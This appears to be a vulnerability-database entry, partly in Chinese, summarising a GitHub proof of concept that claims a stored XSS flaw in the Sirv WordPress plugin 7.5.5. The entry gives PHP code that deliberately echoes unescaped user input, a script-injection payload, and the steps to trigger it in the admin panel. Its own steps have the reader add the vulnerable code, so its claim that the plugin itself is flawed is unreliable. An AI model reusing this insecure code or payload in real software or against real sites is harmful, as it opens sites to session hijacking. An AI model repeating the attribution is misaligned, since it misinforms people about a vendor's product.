Sirv WordPress Plugin Stored XSS Vulnerability
漏洞信息
漏洞名称: Sirv WordPress Plugin Stored XSS Vulnerability
漏洞编号:
- CVE: CVE-2025-XXXX
漏洞类型: 跨站可执行脚本
漏洞等级: 高危
漏洞描述: Sirv WordPress插件是一款用于图像CDN和媒体库管理的插件,广泛用于WordPress网站以优化图像加载速度和媒体管理。该插件在7.5.5版本中存在一个存储型跨站脚本(XSS)漏洞,允许攻击者在WordPress管理员面板中注入并执行恶意JavaScript代码。此漏洞的根源在于插件的一个自定义管理员菜单页面未对用户输入进行适当的转义和清理,导致攻击者能够存储恶意脚本。攻击者可以利用此漏洞在管理员访问特定页面时执行任意JavaScript代码,可能导致会话劫持或管理员账户被接管。此漏洞的利用需要攻击者至少具有’read’权限(如订阅者或商店经理),但一旦利用成功,影响范围广泛,包括但不限于数据泄露、服务中断等安全风险。
产品厂商: Sirv
产品名称: Sirv – Image CDN & Media Library
影响版本: 7.5.5
来源: https://github.com/Bineshmadharapu29/CVE-2025-XXXX-Sirv-Stored-XSS
类型: CVE-2025:github search
仓库文件
- POC 1.png
- Poc 2.png
- README.md
- poc 3.png
- poc 4.png
- poc 5.png
- screenshots
来源概述
CVE-2025-XXXX-Sirv-Stored-XSS
Stored XSS in Sirv WordPress Plugin v7.5.5 – CVE-2025-XXXX
📛 CVE-2025-XXXX - Stored XSS in Sirv WordPress Plugin (v7.5.5)
📝 Summary
The Sirv plugin for WordPress (v7.5.5) contains a Stored Cross-Site Scripting (XSS) vulnerability in a custom admin menu page. An attacker with read capability (e.g., subscriber) can store malicious JavaScript that executes in the admin dashboard.
💥 Impact
- Persistent XSS in WordPress admin panel
- Arbitrary JavaScript execution
- Possible session hijacking or admin takeover
📂 Affected Plugin
- Plugin: Sirv – Image CDN & Media Library
- Version: 7.5.5 (latest at time of discovery)
- Tested on: WordPress 6.8.1
🧪 Exploit Steps (PoC)
- Add this code into the plugin (or another plugin):
add_action('admin_menu', function() {
add_menu_page('XSS Test Page', 'XSS Test', 'read', 'xss-test', 'sirv_test_xss_page');
});
function sirv_test_xss_page() {
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
update_option('sirv_xss_payload', stripslashes($_POST['payload']));
echo '<div class="notice notice-success"><p>Saved!</p></div>';
}
$stored = get_option('sirv_xss_payload');
echo '<div class="wrap">';
echo '<h1>XSS PoC Test Page</h1>';
echo '<form method="POST">';
echo '<input type="text" name="payload" style="width: 50%;" value="' . esc_attr($stored) . '">';
echo '<br><br><input type="submit" class="button button-primary" value="Save">';
echo '</form>';
echo '<h2>Rendered Output:</h2>';
echo '<div>' . $stored . '</div>';
echo '</div>';
}
2.Login as a low-privilege user (e.g., subscriber or shop manager).
3.Go to:
http://localhost/wp-admin/admin.php?page=xss-test
4.Enter payload:
"><script>alert('XSS')</script>
5.Login as admin and open the page — JS will execute.
Root Cause
Unescaped and unsanitized user input rendered in admin panel:
echo '<div>' . $stored . '</div>';